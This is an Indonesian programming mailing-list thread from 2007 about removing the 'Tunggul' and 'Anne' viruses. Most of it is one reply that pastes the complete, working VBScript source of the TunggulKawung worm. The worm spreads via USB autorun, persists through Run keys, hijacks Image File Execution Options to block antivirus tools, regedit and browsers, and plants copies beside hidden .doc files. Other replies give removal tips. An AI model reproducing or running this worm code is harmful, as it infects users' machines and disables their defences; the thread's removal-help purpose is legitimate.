Mas khairul, capslock keyboardnya rusak, ya?
________________________________ From: [email protected] [mailto:[EMAIL PROTECTED] On Behalf Of khairul hamid hamd Sent: Saturday, August 25, 2007 2:04 AM To: [email protected] Subject: Re: [indoprog-vb] Mohon Bantuan Ilangin Virus Anne dan Tunggul MAT MALAM YUSFENDI COBA PAKE ANTI VIRUS ANSAV VERSI ANSAV+E ADVANCED 1.6.7 ABIS SCAN....TERUS AKTIFKAN PLUGIN HIDDEN REVEAL.DLL (UNTUK BUKA SEMUA HIDDEN VBS NYA... TERUS DELETE MANUAL AJA .. TAPI SEBELUM SCAN NON AKTIFIN SYSTEM RESTORE.. SEMOGA BERMANFAAT yusfen fendi <[EMAIL PROTECTED] <mailto:yusfen26%40yahoo.com> > wrote: mas ahmad dan mas heri, saya masih awam untukVB, so kurang ngerti dengan Source mas ahmad, mungkin bisa kasih pencerahan gimana ilangin virusnya, please, atas bantuanya terimakasih, salam, efendi AHMAD SYAHRUDDIN <[EMAIL PROTECTED] <mailto:asm2000id%40yahoo.com> > wrote: Berikut adalah script virus Tunggul.. mungkin bisa memahami cara kerjanya. Silahkan dipelajari : ' 982 '---------------------------------------------------------- ' Contoh Virus Visual Basic Script ' Nama Virus : TunggulKawung.VBS-1 '---------------------------------------------------------- on error resume next Dim winpath, sispath, tempath, FlashDisk, fso, wsshell, nask, autorn, filekor Dim Drives, Drive, cekdrive, tekvir, text, Buatfile, namafile, filetext Dim DesPath1, DesPath2, Scut1, Scut2 Set fso = CreateObject("Scripting.FileSystemObject") Set wsshell = CreateObject("WScript.Shell") Set filetext = fso.OpenTextFile(WScript.ScriptFullName,1) namafile = "Tunggul.vbs" autorn = "[autorun]"&vbcrlf&"shellexecute=wscript.exe " & namafile Set nask = fso.getfile(Wscript.ScriptFullname) cekdrive = nask.drive.drivetype Set winpath = fso.GetSpecialFolder(0) Set sispath = fso.GetSpecialFolder(1) Set tempath = fso.GetSpecialFolder(2) Set text = nask.openastextstream(1, -2) Randomize Timer Aka=Int(rnd*1000) Akb=Int(rnd*30) If Akb=0 Then Akb=10 Tamb=String(Akb,"-") tekavir = text.readline tekvir="' "&Aka&Tamb&vbCrLf Do While Not text.atendofstream tekvir = tekvir&text.readline tekvir = tekvir&vbCrLf Loop Shortcut() sudah=0 Do Set filekor = fso.getfile(winpath & "\" & namafile) filekor.Attributes = 32 Set filekor = fso.createtextfile(winpath & "\" & namafile, 2, True) filekor.write tekvir filekor.Close Set filekor = fso.getfile(winpath & "\" & namafile) filekor.Attributes = 39 For Each FlashDisk In fso.drives If (FlashDisk.drivetype = 1 Or FlashDisk.drivetype = 2) And FlashDisk.Path <> "A:" Then Set filekor = fso.getfile(FlashDisk.Path & "\" & namafile) filekor.Attributes = 32 Set filekor = fso.createtextfile(FlashDisk.Path & "\" & namafile, 2, True) filekor.write tekvir filekor.Close Set filekor = fso.getfile(FlashDisk.Path & "\" & namafile) filekor.Attributes = 39 Set filekor = fso.getfile(FlashDisk.Path & "\autorun.inf") filekor.Attributes = 32 Set filekor = fso.createtextfile(FlashDisk.Path & "\autorun.inf", 2, True) filekor.write autorn filekor.Close Set filekor = fso.getfile(FlashDisk.Path & "\autorun.inf") filekor.Attributes = 39 End If Next rdw="REG_DWORD" Smwc = "\Software\Microsoft\Windows\CurrentVersion\" Hsmwci = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" wsshell.regwrite "HKLM"&Smwc&"Run\WinSystem", "wscript.exe " & winpath & "\" & namafile wsshell.regwrite Hsmwci&"cmd.exe\Debugger"," " wsshell.regwrite Hsmwci&"msconfig.exe\Debugger"," " wsshell.regwrite Hsmwci&"regedit.exe\Debugger"," " wsshell.regwrite Hsmwci&"PCMAV.exe\Debugger"," " wsshell.regwrite Hsmwci&"PCMAV-CLN.exe\Debugger"," " wsshell.regwrite Hsmwci&"PCMAV-RTP.exe\Debugger"," " wsshell.regwrite Hsmwci&"PCMAV-SE.exe\Debugger"," " wsshell.regwrite Hsmwci&"VB6.exe\Debugger"," " wsshell.regwrite Hsmwci&"autorun.exe\Debugger"," " wsshell.regwrite Hsmwci&"ansav.exe\Debugger"," " wsshell.regwrite Hsmwci&"viremoval.exeDebugger"," " wsshell.regwrite Hsmwci&"avscan.exe\Debugger"," " wsshell.regwrite Hsmwci&"avgnt.exe\Debugger"," " wsshell.regwrite Hsmwci&"iexplore.exe\Debugger"," " wsshell.regwrite Hsmwci&"firefox.exe\Debugger"," " wsshell.regwrite "HKLM"&Smwc&"Run\WinSystem", "wscript.exe " & winpath & "\" & namafile wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoFind", "1", rdw wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoFolderOptions", "1", rdw wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoRun", "1", rdw wsshell.RegWrite "HKCU"&Smwc&"Policies\System\DisableRegistryTools", "0", rdw wsshell.RegWrite "HKCU"&Smwc&"Policies\System\DisableTaskMgr", "0", rdw wsshell.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2" If Minute(Now)=1 and sudah<>1 Then Tularifiledoc() sudah=1 End If If cekdrive <> 1 Then Wscript.sleep 100000 Loop While cekdrive <> 1 Sub Tularifiledoc() Set Drives=fso.drives For Each Drive In Drives If Drive<>"A:" Then If Drive.IsReady Then Cari Drive & "\" End If End If Next End sub Sub Shortcut() DesPath1 = wsshell.SpecialFolders("Desktop") DesPath2 = wsshell.SpecialFolders("StartUp") Set Scut1 = wsshell.CreateShortcut(DesPath1 & "\Harry Potter.lnk") Set Scut2 = wsshell.CreateShortcut(DesPath2 & "\Bogor Kota Hujan.lnk") Set Fileke1 = fso.createtextfile(sispath& "\iexplore.vbs", 2, True) Set Fileke2 = fso.createtextfile(tempath& "\Bogor.vbs", 2, True) Fileke1.Write tekvir Fileke1.Close() Scut1.TargetPath = wsshell.ExpandEnvironmentStrings(sispath&"\iexplore.vbs") Scut1.Save Fileke2.Write tekvir Fileke2.Close() Scut2.TargetPath = wsshell.ExpandEnvironmentStrings(tempath&"\Bogor.vbs") Scut2.Save End Sub Function Cari(Path) On Error Resume Next Dim Folder, Subfolder, SubFolders, File, Files, filekor Set Folder=fso.GetFolder(Path) Set Files=Folder.Files For Each File In Files If fso.GetExtensionName(File.Path)="doc" Then namfa=fso.GetBaseName(File.Path) Set filekor = fso.GetFile(File.Path) filekor.Attributes = 39 Set Buatfile=fso.CreateTextFile(File.ParentFolder & "\" & namfa & ".vbs") Buatfile.Write tekvir Buatfile.Close() End If Next Set SubFolders=Folder.SubFolders For Each Subfolder In Subfolders Cari Subfolder.Path Next End Function yusfen fendi <[EMAIL PROTECTED] <mailto:yusfen26%40yahoo.com> > wrote: Para Rekan Semua, Mohon bantuan ilangin Virus Anne dan Tunggul, atas bantuanya terimakasih, efendi --------------------------------- Luggage? GPS? Comic books? Check out fitting gifts for grads at Yahoo! Search. [Non-text portions of this message have been removed] --------------------------------- Be a better Heartthrob. Get better relationship answers from someone who knows. Yahoo! Answers - Check it out. [Non-text portions of this message have been removed] --------------------------------- Be a better Globetrotter. Get better travel answers from someone who knows. Yahoo! Answers - Check it out. [Non-text portions of this message have been removed] --------------------------------- Be a better Heartthrob. Get better relationship answers from someone who knows. Yahoo! Answers - Check it out. [Non-text portions of this message have been removed] NOTICE - This message and any attached files may contain information that is confidential and intended only for use by the intended recipient. If you are not the intended recipient or the person responsible for delivering the message to the intended recipient, be advised that you have received this message in error and that any dissemination, copying or use of this message or attachment is strictly forbidden, as is the disclosure of the information therein. If you have received this message in error please notify the sender immediately and delete the message. [Non-text portions of this message have been removed]
